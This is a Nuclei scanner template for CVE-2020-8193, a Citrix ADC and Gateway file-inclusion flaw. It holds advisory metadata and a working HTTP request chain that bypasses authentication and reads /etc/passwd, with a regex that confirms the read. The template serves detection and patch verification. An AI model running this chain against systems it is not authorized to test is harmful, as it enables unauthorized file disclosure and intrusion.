id: CVE-2020-8193 info: name: Citrix - Local File Inclusion author: pdteam severity: medium description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints. remediation: | Apply the latest security patches or updates provided by Citrix to fix the local file inclusion vulnerability. reference: - https://github.com/jas502n/CVE-2020-8193 - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html - https://support.citrix.com/article/CTX276688 - https://nvd.nist.gov/vuln/detail/CVE-2020-8193 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2020-8193 cwe-id: CWE-287,CWE-284 epss-score: 0.93458 epss-percentile: 0.98807 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 6 vendor: citrix product: application_delivery_controller_firmware tags: cve,cve2020,citrix,lfi,kev,packetstorm http: - raw: - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml X-NITRO-USER: xpyZxwy6 X-NITRO-PASS: xWXHUJ56 - | GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 Host: {{Hostname}} - | GET /menu/neo HTTP/1.1 Host: {{Hostname}} - | GET /menu/stc HTTP/1.1 Host: {{Hostname}} - | POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 rand_key: {{randkey}} - | POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml X-NITRO-USER: oY39DXzQ X-NITRO-PASS: ZuU9Y9c1 rand_key: {{randkey}} cookie-reuse: true matchers: - type: regex part: body regex: - "root:.*:0:0:" extractors: - type: regex name: randkey # dynamic variable regex: - "(?m)[0-9]{3,10}\\.[0-9]+" internal: true part: body # digest: 490a0046304402206f3130318b33c188fe8fe8ed17c4fca1335861421f9e22099d824f6157e9dba202201ea2d0dfafb08fe4a08174b63685bd3716a579464da59c9f0d7268238acd556d:922c64590222798bb761d5b6d8e72950